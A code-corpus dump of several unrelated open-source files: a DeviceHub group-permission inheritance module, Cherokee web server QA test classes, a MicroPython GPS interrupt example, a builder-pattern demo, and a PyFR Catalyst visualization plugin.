Copies all the ancestors of the parent to the children (adding the parent as an ancestor), adding the
*parents_perms* to the children xor removing accounts. Then, recursively it calls itself to update the
descendants of the children.
Note that inherit is called too when **dis**inheriting, because this method will transmit the result of
the "disinheritance" to the descendants. This is why this method supports *accounts_to_remove* property.
Certain kind of groups behave differently here and they override this method.
:param parent_id: The id of the parent, used as FK.
:param parent_ancestors: An *ancestor dict*, see the Group Schema for more info.
:param child_domain: The domain of the children. Note that this forces all children to be of the same @type.
Call inherit as many times as types of children you have.
:param children: A list of children id.
"""
# Inheritance mechanism:
# - If parent is place, inherit all its places.
# - ancestors.prepend({'@type': 'Place', 'name': '', 'places': [_id]})
# - If parent is lot:
# - If child is lot, inherit places and lots
# - ancestors.prepend({'@type': 'Lot', 'name': '', 'places': [_id], 'lots': [_id]})
# - If child is package or device, inherit only lots
# - ancestors.prepend({'@type': 'Lot', 'name': '', 'lots': [_id]})
# - If parent is package (then child can only be package or device) inherit everything:
# - ancestors.prepend({'@type': 'Lot', 'name': '', 'lots': [_id], 'packages': [_id], 'places': [_id]})
# As places only have places is the same as inheriting everything they have.
groups = cls.children_resources.keys()
full_children = cls._inherit(groups, parent_id, parent_ancestors, child_domain, children, parent_perms,
accounts_to_remove)
if issubclass(child_domain, GroupDomain):
cls._update_inheritance_grandchildren(full_children, child_domain, parent_perms, accounts_to_remove)
@classmethod
def _inherit(cls, groups_to_inherit: Iterable, parent_id: str, parent_ancestors: list, child_domain: Type[Domain],
resources: Set[str], parent_perms: Perms = None, accounts_to_remove: List[str] = None) -> list:
"""
Copies the passed-in ancestors to the resources with the new permissions xor accounts to remove.
This method specifically computes the *ancestors* property for each children and then calls to _update_db
to update their value.
Ancestors are merged in a set, avoiding repetition of ancestors for resources with multiple parents. When
pasting the copy, it tries to identify an existing ancestors dictionary given by the parent,
otherwise creates a new one.
"""
# update_db needs 2 queries:
# ancestors is a query that will be used when creating a relationship resource - parent
# (the resource has a new parent)
ancestors = {'@type': cls.resource_settings._schema.type_name, '_id': parent_id}
# update_query is used to replace the ancestors of my parent
update_query = {'$set': {}}
for resource_name in groups_to_inherit:
ancestors[resource_name] = set() # We want to explicitly 'set' for the db
# for all the parents of my parent
for grandparent in parent_ancestors:
if resource_name in grandparent:
ancestors[resource_name] |= set(grandparent[resource_name])
if grandparent['@type'] == Naming.type(resource_name): # We add the grandparent itself
ancestors[resource_name].add(grandparent['_id'])
# Let's copy the result of the iteration to the update query
update_query['$set']['ancestors.$.' + resource_name] = ancestors[resource_name]
# ADDING PERMISSIONS
# ------------------
# Note that adding permissions is an easy query so we can do it here,
# removing permissions is more difficult and is done inside _remove_perms(), executed inside of
# _update_db
if parent_perms:
# inherit is executed after an ancestor moved to another one
# in this case we override the perms of the descendants
# todo if inherit is produced because a resource was **added** (not moved) to another lot
# todo we are loosing the perms of the first lot, this should only be happening when moving
# todo and not copying
update_query['$set']['perms'] = parent_perms
return cls._update_db(parent_id, resources, ancestors, update_query, child_domain,
parent_perms, accounts_to_remove)
@classmethod
def _update_db(cls, parent_id: str, resources: Set[str], ancestors_new: dict, update_query: dict,
child_domain: Type[Domain], parent_perms: Perms = None,
parent_accounts_remove: List[str] = None) -> List[dict]:
"""
Executes in database for the passed-in resources and, for devices, their components too:
- The query (the passed-in *ancestors_update*) computed in *_inherit*. This query
updates *ancestors* and **adds** permissions.
- Removes permissions when passing in *parent_acounts_remove* (internally calling *_remove_perms*)
- For devices, adds and removes permissions for accounts when necessary (internally calling *_remove_perms*)
"""
new_children = []
for resource in resources: # We cannot run all the resources at once when catching exceptions
try:
# Let's try to update an existing ancestor dict (this is with the same _id and @type),
# Note that this only will succeed when a relationship child-parent already exists, and this happens
# when we are updating the grandchilden (and so on) after adding/deleting a relationship
eq = {'ancestors.@type': ancestors_new['@type'], 'ancestors._id': parent_id}
full_child, *_ = child_domain.update_raw_get(resource, update_query, extra_query=eq, upsert=True)
except OperationFailure as e:
if e.code == 16836:
# There is not an ancestor dict, so let's create one
# This only happens when creating a relationship parent-child
new_query = {
'$push': {'ancestors': {'$each': [ancestors_new], '$position': 0}},
}
if parent_perms is not None:
# ADDING PERMISSIONS (bis)
# ------------------------
new_query['$set'] = {'perms': parent_perms}
full_child, *_ = child_domain.update_raw_get(resource, new_query)
else:
raise e
new_children.append(full_child)
# UPDATE COMPONENTS
# -----------------
# Components of devices inherit exactly the same way as their parents, so
# let's re-call this method with the components
components = full_child.get('components', []) # Let's update the components
if components:
cls._update_db(parent_id, components, ancestors_new, update_query, ComponentDomain, parent_perms,
parent_accounts_remove)
# REMOVING PERMISSIONS
# --------------------
# Update perms for all children
# Note that we took profit of the update above to add permissions
if parent_accounts_remove:
# We are inheriting the removal of permissions
cls._remove_perms(new_children, parent_accounts_remove, child_domain)
# ADDING PERMISSIONS TO EVENTS
# ----------------------------
if parent_perms:
events_id = py_(new_children).pluck('events').flatten().pluck('_id').value()
cls.add_perms_to_events(events_id, parent_perms)
return new_children
@classmethod
def _update_inheritance_grandchildren(cls, full_children: list, child_domain: Type['GroupDomain'],
parent_perms: Perms = None, accounts_to_remove: List[str] = None):
"""
Moves forward in updating the inheritance for the descendants by calling inherit, passing the
child as the parent and the grand-children as children.
As *inherit* calls this method, recursively they update the ancestors of all descendants.
:param full_children: The children whose children (our grand-children) will be updated
:param child_domain: The domain of the children. Note that this forces all children to be the same @type.
"""
if child_domain.resource_settings.resource_name() in Group.resource_names:
for full_child in full_children:
for name in child_domain.children_resources.keys():
grandchildren_domain = child_domain.children_resources[name]
grandchildren = set(full_child['children'][name]) if name in full_child['children'] else set()
if grandchildren:
child_domain.inherit(full_child['_id'], full_child['ancestors'], grandchildren_domain,
grandchildren, parent_perms, accounts_to_remove)
@classproperty
def children_resources(cls) -> Dict[str, Type[Domain]]:
"""Dict containing the ResourceDomain of each type of children a group can have."""
if not hasattr(cls, '_children_resources'):
from ereuse_devicehub.resources.group.physical.place.domain import PlaceDomain
from ereuse_devicehub.resources.group.physical.package.domain import PackageDomain
from ereuse_devicehub.resources.group.physical.pallet.domain import PalletDomain
from ereuse_devicehub.resources.group.abstract.lot.domain import LotDomain
from ereuse_devicehub.resources.group.abstract.lot.incoming_lot.domain import IncomingLotDomain
from ereuse_devicehub.resources.group.abstract.lot.outgoing_lot.domain import OutgoingLotDomain
children_resources = {
PlaceDomain.resource_settings.resource_name(): PlaceDomain,
PackageDomain.resource_settings.resource_name(): PackageDomain,
DeviceDomain.resource_settings.resource_name(): DeviceDomain,
LotDomain.resource_settings.resource_name(): LotDomain,
IncomingLotDomain.resource_settings.resource_name(): IncomingLotDomain,
OutgoingLotDomain.resource_settings.resource_name(): OutgoingLotDomain,
ComponentDomain.resource_settings.resource_name(): ComponentDomain,
PalletDomain.resource_settings.resource_name(): PalletDomain
}
types = {DeviceDomain.resource_settings.resource_name(), ComponentDomain.resource_settings.resource_name()}
types |= cls.resource_settings._schema.resource_names
cls._children_resources = pick(children_resources, *types)
return cls._children_resources
@classmethod
def is_parent(cls, parent_type: str, parent_id: str, child_id: str) -> bool:
q = {'_id': child_id, 'ancestors': {'$elemMatch': {'@type': parent_type, '_id': parent_id}}}
try:
return bool(cls.get_one(q))
except ResourceNotFound:
return False
@classmethod
def get_descendants(cls, child_domain: Type[Domain], parent_ids: str or list) -> list:
"""
Get the descendants of this class type of the given ancestor.
:param child_domain: The child domain.
:param parent_ids: The id of a parent or a list of them. We retrieve descendants of **any** parent.
"""
# The following is possible because during the inheritance, we only add to 'ancestors' the valid ones.
type_name = cls.resource_settings._schema.type_name
ids = parent_ids if type(parent_ids) is list else [parent_ids]
query = {
'$or': [
{'ancestors': {'$elemMatch': {'@type': type_name, '_id': {'$in': ids}}}},
{'ancestors': {'$elemMatch': {cls.resource_settings.resource_name(): {'$elemMatch': {'$in': ids}}}}}
]
}
return child_domain.get(query)
@classmethod
def get_all_descendants(cls, parent_ids: str or list) -> list:
# Todo enhance by performing only one query
return map_values(cls.children_resources, lambda domain: cls.get_descendants(domain, parent_ids))
@classmethod
def _remove_perms(cls, resources: List[dict], accounts: List[str], child_domain: Type[Domain]):
"""
Remove the permissions of the passed-in accounts from the resources.
We drop the perm for those accounts that don't have explicit access.
:param resources: Resources to remove permissions from.
:param accounts: The accounts to remove, if don't have explicit access.
:param child_domain: The child domain.
"""
# Remove permissions
for resource in resources:
# Compute which accounts we remove
accounts_to_remove = difference(accounts, resource.get('sharedWith', []))
# Get the perms referencing those accounts
perms = difference_with(resource['perms'], accounts_to_remove, comparator=lambda a, b: a['account'] == b)
if len(perms) != len(resource['perms']):
# We have lost some permissions
child_domain.update_one_raw(resource['_id'], {'$set': {'perms': perms}})
resource['perms'] = perms # As we pass it into another function, just in case it is used later
if resource['@type'] in Device.types:
# For devices, we need to update their events too
cls._remove_perms_in_event(accounts_to_remove, resource['_id'])
@classmethod
def _remove_perms_in_event(cls, accounts_to_remove_from_device: List[ObjectId], device_id: str):
"""
Removes the permissions for the passed-in accounts, which the device is loosing, from the events.
The accounts loose their permission only if, apart from the passed-in device (where the accounts are lost),
the accounts don't have permissions on the other devices.
:param accounts_to_remove_from_device: The accounts that we want to remove.
:param device_id: The device that is dropping access for the accounts.
:param events_id: The affected events.
"""
from ereuse_devicehub.resources.event.device import DeviceEventDomain
for event in DeviceEventDomain.get_devices_components_id([device_id]):
# Which accounts have access to any of the other devices?
# Those accounts with access will be saved, as it means the user can access the event because this
# event represents a device that the account can access to.
# Accounts that don't have access to other devices mean that they only had access to the
# device we are removing, so we will drop access to the account as well.
devices_id = DeviceEventDomain.devices_id(event, DeviceEventDomain.DEVICES_ID_COMPONENTS)
devices_id.remove(device_id)
devices = DeviceDomain.get_in('_id', devices_id)
accounts_to_remove_from_event = difference(accounts_to_remove_from_device,
py_(devices).pluck('perms').flatten().pluck('account').value())
if accounts_to_remove_from_event:
cls._remove_perms([event], accounts_to_remove_from_event, DeviceEventDomain)
@classmethod
def update_and_inherit_perms(cls, resource_id: dict, resource_type: str, label: str, shared_with: Set[ObjectId],
old_perms: List[dict], new_perms: List[dict]):
"""
Update the sharedWith of the resource and inherits the **changed** (and only the changed) permissions to its
descendants.
sharedWith is updated for both the resource and its descendants, if needed; this updates the account too.
Be aware that the cost of this method greatly increases by the number of descendants.
:raise UserHasExplicitDbPerms: You can't share to accounts that already have full access to this database.
"""
if old_perms != new_perms:
# Add new explicit shares to the *sharedWith* list and materialize it in the affected accounts
accounts_to_add = set(pluck(new_perms, 'account')) - set(pluck(old_perms, 'account'))
shared_with |= accounts_to_add
# This can raise an exception and thus need to be executed before any modification in the DB
AccountDomain.add_shared(accounts_to_add, resource_type, AccountDomain.requested_database, resource_id,
label)
# We compute which permissions we need to set (or re-set because they changed)
accounts_to_remove = set(pluck(old_perms, 'account')) - set(pluck(new_perms, 'account'))
shared_with = cls.remove_shared_with(resource_type, resource_id, shared_with, accounts_to_remove)
# Inherit
new_modified_perms = difference(new_perms, old_perms) # New or modified permissions to write to descendants
for resource_name, domain in cls.children_resources.items():
for descendant in cls.get_descendants(domain, resource_id):
# Remove permissions
f = lambda a, b: a['account'] == b
perms = difference_with(descendant['perms'], list(accounts_to_remove), comparator=f)
# Set or re-set new or updated permissions
perms = union_by(new_modified_perms, perms, iteratee=lambda x: x['account'])
q = {'$set': {'perms': perms}}
if resource_name not in Device.resource_names:
# Remove accounts that lost permission from sharedWith
descendant_shared_with = set(descendant.get('sharedWith', set()))
descendant_shared_with = cls.remove_shared_with(descendant['@type'], descendant['_id'],
descendant_shared_with, accounts_to_remove)
q['$set']['sharedWith'] = descendant_shared_with
else:
# For devices, remove the perms from the events
cls._remove_perms_in_event(list(accounts_to_remove), descendant['_id'])
# add new perms to events
events_id = pluck(descendant['events'], '_id')
cls.add_perms_to_events(events_id, perms)
# Update the changes of the descendant in the database
domain.update_one_raw(descendant['_id'], q)
return shared_with
@classmethod
def remove_shared_with(cls, type_name: str, _id: str or ObjectId, shared_with: Set[ObjectId],
accounts_to_remove: Set[ObjectId]) -> Set[ObjectId]:
"""Removes the shared accounts, updating the accounts database. Returns the new sharedWith."""
db = AccountDomain.requested_database
AccountDomain.remove_shared(db, shared_with.intersection(accounts_to_remove), _id, type_name)
return set(shared_with) - accounts_to_remove
@staticmethod
def add_perms_to_events(events_id: List[str], perms: List[dict]):
"""Adds the perms to the events."""
for event in DeviceEventDomain.get_in('_id', events_id):
_perms = union_by(event['perms'], perms, iteratee=lambda x: x['account'])
DeviceEventDomain.update_one_raw(event['_id'], {'$set': {'perms': _perms}})
class GroupNotFound(ResourceNotFound):
pass
| agpl-3.0 | -4,580,337,173,036,685,000 | 56.462719 | 120 | 0.629584 | false |
chetan/cherokee | qa/base.py | 2 | 12534 | # -*- coding: utf-8 -*-
# Cherokee QA Tests
#
# Authors:
# Alvaro Lopez Ortega <[email protected]>
#
# Copyright (C) 2001-2010 Alvaro Lopez Ortega
# This file is distributed under the GPL license.
import os
import imp
import sys
import types
import socket
import string
import tempfile
from conf import *
from util import *
DEFAULT_READ = 8192
def importfile(path):
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
module = imp.load_module(name, file, path, (ext, 'r', imp.PY_SOURCE))
file.close()
return module
class TestBase:
def __init__ (self, file):
self.file = file # 001-basic.py
self.name = None # Test 01: Basic functionality
self.conf = None # Directory /test { .. }
self.request = "" # GET / HTTP/1.0
self.proxy_suitable = True
self.post = None
self.expected_error = None
self.expected_content = None
self.forbidden_content = None
self.disabled = False
self._initialize()
def _initialize (self):
self.ssl = None
self.reply = "" # "200 OK"..
self.version = None # HTTP/x.y: 9, 0 or 1
self.reply_err = None # 200
def _safe_read (self, s):
while True:
try:
if self.ssl:
return self.ssl.read (DEFAULT_READ)
else:
return s.recv (DEFAULT_READ)
except socket.error, (err, strerr):
if err == errno.EAGAIN or \
err == errno.EWOULDBLOCK or \
err == errno.EINPROGRESS:
continue
raise
def _do_request (self, host, port, ssl):
for res in socket.getaddrinfo (host, port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except socket.error, msg:
continue
try:
s.connect(sa)
except socket.error, msg:
s.close()
s = None
continue
break
if s is None:
raise Exception("Couldn't connect to the server")
if ssl:
try:
self.ssl = socket.ssl (s)
except:
raise Exception("Couldn't handshake SSL")
request = self.request + "\r\n"
if self.post is not None:
request += self.post
if self.ssl:
n = self.ssl.write (request)
else:
n = s.send (request)
assert (n == len(request))
while True:
try:
d = self._safe_read (s)
except Exception, e:
d = ''
if not len(d):
break
self.reply += d
s.close()
def _parse_output (self):
if not len(self.reply):
raise Exception("Empty header")
# Protocol version
reply = self.reply.split('\r', 1)[0]
if reply[:8] == "HTTP/0.9":
self.version = 9
elif reply[:8] == "HTTP/1.0":
self.version = 0
elif reply[:8] == "HTTP/1.1":
self.version = 1
else:
raise Exception("Invalid header, len=%d: '%s'" % (len(reply), reply))
# Error code
reply = reply[9:]
try:
self.reply_err = int (reply[:3])
except:
raise Exception("Invalid header, version=%d len=%d: '%s'" % (self.version, len(reply), reply))
def _check_result_expected_item (self, item):
if item.startswith("file:"):
f = open (item[5:])
error = not f.read() in self.reply
f.close
if error:
return -1
else:
if not item in self.reply:
return -1
def _check_result_forbidden_item (self, item):
if item.startswith("file:"):
f = open (item[5:])
error = f.read() in self.reply
f.close
if error:
return -1
else:
if item in self.reply:
return -1
def _check_result (self):
if self.reply_err != self.expected_error:
return -1
if self.expected_content != None:
if type(self.expected_content) in (types.StringType, types.UnicodeType):
r = self._check_result_expected_item (self.expected_content)
if r == -1:
return -1
elif type(self.expected_content) == types.ListType:
for entry in self.expected_content:
r = self._check_result_expected_item (entry)
if r == -1:
return -1
else:
raise Exception("Syntax error")
if self.forbidden_content != None:
if type(self.forbidden_content) in (types.StringType, types.UnicodeType):
r = self._check_result_forbidden_item (self.forbidden_content)
if r == -1:
return -1
elif type(self.forbidden_content) == types.ListType:
for entry in self.forbidden_content:
r = self._check_result_forbidden_item (entry)
if r == -1:
return -1
else:
raise Exception("Syntax error")
r = self.CustomTest()
if r == -1:
return -1
return 0
def Clean (self):
self._initialize()
def Precondition (self):
return True
def Prepare (self, www):
None
def JustBefore (self, www):
None
def JustAfter (self, www):
None
def CustomTest (self):
return 0
def Run (self, host, port, ssl):
self._do_request(host, port, ssl)
self._parse_output()
return self._check_result()
def __str__ (self):
src = "\tName = %s\n" % (self.name)
if self.version == 9:
src += "\tProtocol = HTTP/0.9\n"
elif self.version == 0:
src += "\tProtocol = HTTP/1.0\n"
elif self.version == 1:
src += "\tProtocol = HTTP/1.1\n"
if self.conf is not None:
src += "\tConfig = %s\n" % (self.conf)
header_full = string.split (self.reply, "\r\n\r\n")[0]
headers = string.split (header_full, "\r\n")
requests = string.split (self.request, "\r\n")
src += "\tRequest = %s\n" % (requests[0])
for request in requests[1:]:
if len(request) > 1:
src += "\t\t%s\n" %(request)
if self.post is not None and not self.nobody:
src += "\tPost = %s\n" % (self.post)
if self.expected_error is not None:
src += "\tExpected = Code: %d\n" % (self.expected_error)
else:
src += "\tExpected = Code: UNSET!\n"
if self.expected_content is not None:
src += "\tExpected = Content: %s\n" % (self.expected_content)
if self.forbidden_content is not None:
src += "\tForbidden= Content: %s\n" % (self.forbidden_content)
src += "\tReply = %s\n" % (headers[0])
for header in headers[1:]:
src += "\t\t%s\n" %(header)
if not self.nobody:
body = self.reply[len(header_full)+4:]
src += "\tBody len = %d\n" % (len(body))
src += "\tBody = %s\n" % (body)
return src
def Mkdir (self, www, dir, mode=0777):
fulldir = os.path.join (www, dir)
os.makedirs(fulldir, mode)
return fulldir
def WriteFile (self, www, filename, mode=0444, content=''):
assert(type(mode) == int)
fullpath = os.path.join (www, filename)
f = open (fullpath, 'w')
f.write (content)
f.close()
os.chmod(fullpath, mode)
return fullpath
def SymLink (self, source, target):
os.symlink (source, target)
def CopyFile (self, src, dst):
open (dst, 'w').write (open (src, 'r').read())
def Remove (self, www, filename):
fullpath = os.path.join (www, filename)
if os.path.isfile(fullpath):
os.unlink (fullpath)
else:
from shutil import rmtree
try:
rmtree (fullpath)
except: pass
def WriteTemp (self, content):
while True:
name = self.tmp + "/%s" % (letters_random(40))
if not os.path.exists(name): break
f = open (name, "w+")
f.write (content)
f.close()
return name
class Digest:
def __init__ (self):
self.response = None
self.vals = {}
def ParseHeader (self, reply):
ret = {"cnonce":"",
"nonce":"",
"qop":"",
"nc":""}
pos1 = reply.find ("WWW-Authenticate: Digest ") + 25
pos2 = reply.find ("\r", pos1)
line = reply[pos1:pos2]
for item in line.split(", "):
pos = item.find("=")
name = item[:pos]
value = item[pos+1:]
if value[0] == '"':
value = value[1:]
if value[-1] == '"':
value = value[:-1]
ret[name] = value
return ret
def CalculateResponse (self, user, realm, passwd, method, url, nonce, qop, cnonce, nc):
try:
from hashlib import md5
except ImportError:
from md5 import md5
md5obj = md5()
md5obj.update("%s:%s:%s" % (user, realm, passwd))
a1 = md5obj.hexdigest()
md5obj = md5()
md5obj.update("%s:%s" % (method, url))
ha2 = md5obj.hexdigest()
md5obj = md5()
md5obj.update("%s:%s:" % (a1, nonce))
if qop != None:
md5obj.update("%s:" %(nc))
md5obj.update("%s:" %(cnonce))
md5obj.update("%s:" %(qop))
md5obj.update(ha2)
final = md5obj.hexdigest()
return final
def Precondition_UserHome (self, home_subdir="public_html"):
try:
user = os.getlogin()
except OSError:
return False
home = os.path.expanduser("~")
if not home:
return False
public_html = os.path.join (home, home_subdir)
# Look for the public_html directory
if not os.path.exists(public_html):
return False
return public_html, user
class TestCollection:
def __init__ (self):
self.tests = []
self.num = 0
self.disabled = False
def Add (self, test):
self.num += 1
if (test.name == None) or len(test.name) == 0:
test.name = self.name + ", Part %d" % (self.num)
test.tmp = self.tmp
test.nobody = self.nobody
test.php_conf = self.php_conf
test.proxy_suitable = self.proxy_suitable
self.tests.append (test)
return test
def Clean (self):
for t in self.tests:
self.current_test = t
t.Clean()
def Precondition (self):
for t in self.tests:
self.current_test = t
if t.Precondition() == False:
return False
return True
def Prepare (self, www):
for t in self.tests:
self.current_test = t
t.Prepare(www)
def JustBefore (self, www):
for t in self.tests:
self.current_test = t
t.JustBefore(www)
def JustAfter (self, www):
current = self.current_test
for t in self.tests:
self.current_test = t
t.JustAfter(www)
self.current_test = current
def Run (self, host, port, ssl):
for t in self.tests:
self.current_test = t
r = t.Run(host, port, ssl)
if r == -1: return r
return r
def __str__ (self):
return str(self.current_test)
| gpl-2.0 | 1,023,215,754,151,048,200 | 27.293454 | 106 | 0.476863 | false |
inmcm/micropyGPS | pyboard/GPIO_interrupt_updater.py | 1 | 1474 | from pyb import UART
from pyb import ExtInt
from pyb import Pin
from micropyGPS import MicropyGPS
# Global Flag to Start GPS data Processing
new_data = False
# Callback Function
def pps_callback(line):
print("Updated GPS Object...")
global new_data # Use Global to trigger update
new_data = True
print('GPS Interrupt Tester')
# Instantiate the micropyGPS object
my_gps = MicropyGPS()
# Setup the connection to your GPS here
# This example uses UART 3 with RX on pin Y10
# Baudrate is 9600bps, with the standard 8 bits, 1 stop bit, no parity
# Also made the buffer size very large (1000 chars) to accommodate all the characters that stack up
# each second
uart = UART(3, 9600, read_buf_len=1000)
# Create an external interrupt on pin X8
pps_pin = pyb.Pin.board.X8
extint = pyb.ExtInt(pps_pin, pyb.ExtInt.IRQ_FALLING, pyb.Pin.PULL_UP, pps_callback)
# Main Infinite Loop
while 1:
# Do Other Stuff Here.......
# Update the GPS Object when flag is tripped
if new_data:
while uart.any():
my_gps.update(chr(uart.readchar())) # Note the conversion to to chr, UART outputs ints normally
print('UTC Timestamp:', my_gps.timestamp)
print('Date:', my_gps.date_string('long'))
print('Latitude:', my_gps.latitude_string())
print('Longitude:', my_gps.longitude_string())
print('Horizontal Dilution of Precision:', my_gps.hdop)
print()
new_data = False # Clear the flag
| mit | 5,018,743,199,084,742,000 | 30.361702 | 108 | 0.685889 | false |
kkaushik24/python-design-patterns | creational/builder_pattern.py | 1 | 2207 | from abc import ABCMeta, abstractmethod
class Item():
__metaclass__ = ABCMeta
@abstractmethod
def name(self):
pass
@abstractmethod
def packing(self):
pass
@abstractmethod
def price(self):
pass
class Packing():
__metaclass__ = ABCMeta
@abstractmethod
def pack(self):
pass
class Wrapper(Packing):
def pack(self):
return 'Wrapper'
class Bottle(Packing):
def pack(self):
return 'Bottle'
class Burger(Item):
def packing(self):
return Wrapper()
class ColdDrink(Item):
def packing(self):
return Bottle()
class VegBurger(Burger):
def name(self):
return 'VegBurger'
def price(self):
return 25
class ChickenBurger(Burger):
def name(self):
return 'ChickenBruger'
def price(self):
return 50
class Coke(ColdDrink):
def name(self):
return 'Coke'
def price(self):
return 10
class Pepsi(ColdDrink):
def name(self):
return 'Pepsi'
def price(self):
return 20
class Meal():
def __init__(self):
self.item_list = []
def add_item(self, item):
self.item_list.append(item)
def get_cost(self):
total_cost = 0
for item in self.item_list:
total_cost = total_cost + item.price()
return total_cost
def show_items(self):
print 'name packing cost'
for item in self.item_list:
print item.name(), item.packing().pack(), item.price()
class MealBuilder():
def prepare_veg_meal(self):
meal = Meal()
meal.add_item(VegBurger())
meal.add_item(Coke())
return meal
def prepare_nonveg_meal(self):
meal = Meal()
meal.add_item(ChickenBurger())
meal.add_item(Pepsi())
return meal
if __name__ == "__main__":
meal_builder = MealBuilder()
veg_meal = meal_builder.prepare_veg_meal()
print 'veg meal'
veg_meal.show_items()
print veg_meal.get_cost()
nonveg_meal = meal_builder.prepare_veg_meal()
print 'nonveg meal'
nonveg_meal.show_items()
print nonveg_meal.get_cost()
| apache-2.0 | 1,464,812,849,426,969,900 | 15.227941 | 66 | 0.572723 | false |
tjcorona/PyFR | pyfr/plugins/catalyst.py | 1 | 7516 | # -*- coding: utf-8 -*-
from ctypes import *
from mpi4py import MPI
import numpy as np
from pyfr.plugins.base import BasePlugin
from pyfr.ctypesutil import load_library
from pyfr.shapes import BaseShape
from pyfr.util import proxylist, subclass_where
import os
# Contains relevant data pertaining to all instances of a single cell type
class MeshDataForCellType(Structure):
_fields_ = [
('nVerticesPerCell', c_int),
('nCells', c_int),
('vertices', c_void_p),
('nSubdividedCells', c_int),
('con', c_void_p),
('off', c_void_p),
('type', c_void_p)
]
class SolutionDataForCellType(Structure):
_fields_ = [
('ldim', c_int),
('lsdim', c_int),
('soln', c_void_p)
]
class CatalystData(Structure):
_fields_ = [
('nCellTypes', c_int),
('meshData', POINTER(MeshDataForCellType)),
('solutionData', POINTER(SolutionDataForCellType))
]
class CatalystPlugin(BasePlugin):
name = 'catalyst'
systems = ['euler', 'navier-stokes']
def __init__(self, intg, *args, **kwargs):
super().__init__(intg, *args, **kwargs)
self.divisor = self.cfg.getint(self.cfgsect, 'divisor', 3)
self.nsteps = self.cfg.getint(self.cfgsect, 'nsteps')
outputfile = self.cfg.get(self.cfgsect, 'outputfile')
c_outputfile = create_string_buffer(bytes(outputfile, encoding='utf_8'))
# hostname = self.cfg.get(self.cfgsect, 'hostname')
hostname = os.environ.get('PYFR_CLIENT_HOSTNAME', '')
c_hostname = create_string_buffer(bytes(hostname, encoding='utf_8'))
port = self.cfg.getint(self.cfgsect, 'port');
prec = self.cfg.get('backend', 'precision', 'double')
if prec == 'double':
self.catalyst = load_library('pyfr_catalyst_fp64')
else:
self.catalyst = load_library('pyfr_catalyst_fp32')
###################
self.backend = backend = intg.backend
self.mesh = intg.system.mesh
# Amount of subdivision to perform
# comm = MPI.COMM_WORLD
# self.divisor = comm.Get_size()
# Allocate a queue on the backend
self._queue = backend.queue()
# Solution arrays
self.eles_scal_upts_inb = inb = intg.system.eles_scal_upts_inb
# Prepare the mesh data and solution data
meshData, solnData, kerns = [], [], []
for etype, solnmat in zip(intg.system.ele_types, inb):
p, solnop = self._prepare_vtu(etype, intg.rallocs.prank)
# Allocate on the backend
vismat = backend.matrix((p.nVerticesPerCell, self.nvars, p.nCells),
tags={'align'})
solnop = backend.const_matrix(solnop)
backend.commit()
# Populate the soln field and dimension info
s = SolutionDataForCellType(ldim = vismat.leaddim,
lsdim = vismat.leadsubdim,
soln = vismat.data)
# Prepare the matrix multiplication kernel
k = backend.kernel('mul', solnop, solnmat, out=vismat)
# Append
meshData.append(p)
solnData.append(s)
kerns.append(k)
# Save the pieces
catalystData = []
catalystData.append(
CatalystData(nCellTypes = len(meshData),
meshData = (MeshDataForCellType*len(meshData))(*meshData),
solutionData = (SolutionDataForCellType*len(solnData))(*solnData)))
self._catalystData = (CatalystData*len(catalystData))(*catalystData)
# Wrap the kernels in a proxy list
self._interpolate_upts = proxylist(kerns)
# Finally, initialize Catalyst
self._data = self.catalyst.CatalystInitialize(c_hostname,
port,
c_outputfile,
self._catalystData)
def _prepare_vtu(self, etype, part):
from pyfr.writers.paraview import BaseShapeSubDiv
mesh = self.mesh['spt_{0}_p{1}'.format(etype, part)]
# Get the shape and sub division classes
shapecls = subclass_where(BaseShape, name=etype)
subdvcls = subclass_where(BaseShapeSubDiv, name=etype)
# Dimensions
# tjc: nspts: number of points in the element type
# tjc: neles: number of elements of this type
nspts, neles = mesh.shape[:2]
# Sub divison points inside of a standard element
svpts = shapecls.std_ele(self.divisor)
nsvpts = len(svpts)
# Shape
soln_b = shapecls(nspts, self.cfg)
# Generate the operator matrices
mesh_vtu_op = soln_b.sbasis.nodal_basis_at(svpts)
soln_vtu_op = soln_b.ubasis.nodal_basis_at(svpts)
# Calculate node locations of vtu elements
vpts = np.dot(mesh_vtu_op, mesh.reshape(nspts, -1))
vpts = vpts.reshape(nsvpts, -1, self.ndims)
# Append dummy z dimension for points in 2D
if self.ndims == 2:
vpts = np.pad(vpts, [(0, 0), (0, 0), (0, 1)], 'constant')
# Reorder and cast
vpts = vpts.swapaxes(0, 1).astype(self.backend.fpdtype, order='C')
# Perform the sub division
nodes = subdvcls.subnodes(self.divisor)
# Prepare vtu cell arrays
vtu_con = np.tile(nodes, (neles, 1))
vtu_con += (np.arange(neles)*nsvpts)[:, None]
vtu_con = vtu_con.astype(np.int32, order='C')
# Generate offset into the connectivity array
vtu_off = np.tile(subdvcls.subcelloffs(self.divisor), (neles, 1))
vtu_off += (np.arange(neles)*len(nodes))[:, None]
vtu_off = vtu_off.astype(np.int32, order='C')
# Tile vtu cell type numbers
vtu_typ = np.tile(subdvcls.subcelltypes(self.divisor), neles)
vtu_typ = vtu_typ.astype(np.uint8, order='C')
# Construct the meshDataForCellType
meshDataForCellType = \
MeshDataForCellType(nVerticesPerCell=nsvpts,
nCells=neles,
vertices=vpts.ctypes.data_as(c_void_p),
nSubdividedCells=len(vtu_typ),
con=vtu_con.ctypes.data,
off=vtu_off.ctypes.data,
type=vtu_typ.ctypes.data)
# Retain the underlying NumPy objects
meshDataForCellType._vpts = vpts
meshDataForCellType._vtu_con = vtu_con
meshDataForCellType._vtu_off = vtu_off
meshDataForCellType._vtu_typ = vtu_typ
return meshDataForCellType, soln_vtu_op
def __call__(self, intg):
if np.isclose(intg.tcurr,intg.tend):
# Configure the input bank
self.eles_scal_upts_inb.active = intg._idxcurr
# Interpolate to the vis points
self._queue % self._interpolate_upts()
self.catalyst.CatalystCoProcess(c_double(intg.tcurr),intg.nacptsteps,self._data,c_bool(True))
self.catalyst.CatalystFinalize(self._data)
return
if intg.nacptsteps % self.nsteps:
return
# Configure the input bank
self.eles_scal_upts_inb.active = intg._idxcurr
# Interpolate to the vis points
self._queue % self._interpolate_upts()
self.catalyst.CatalystCoProcess(c_double(intg.tcurr),intg.nacptsteps,self._data)
| bsd-3-clause | -1,598,465,594,740,299,800 | 34.45283 | 105 | 0.577967 | false |
DaveBuckingham/robosoft | mctransmitter.py | 1 | 3109 | #
# TRANSMITS COMMANDS TO THE ARDUINO OVER SERIAL
#
import os
import sys
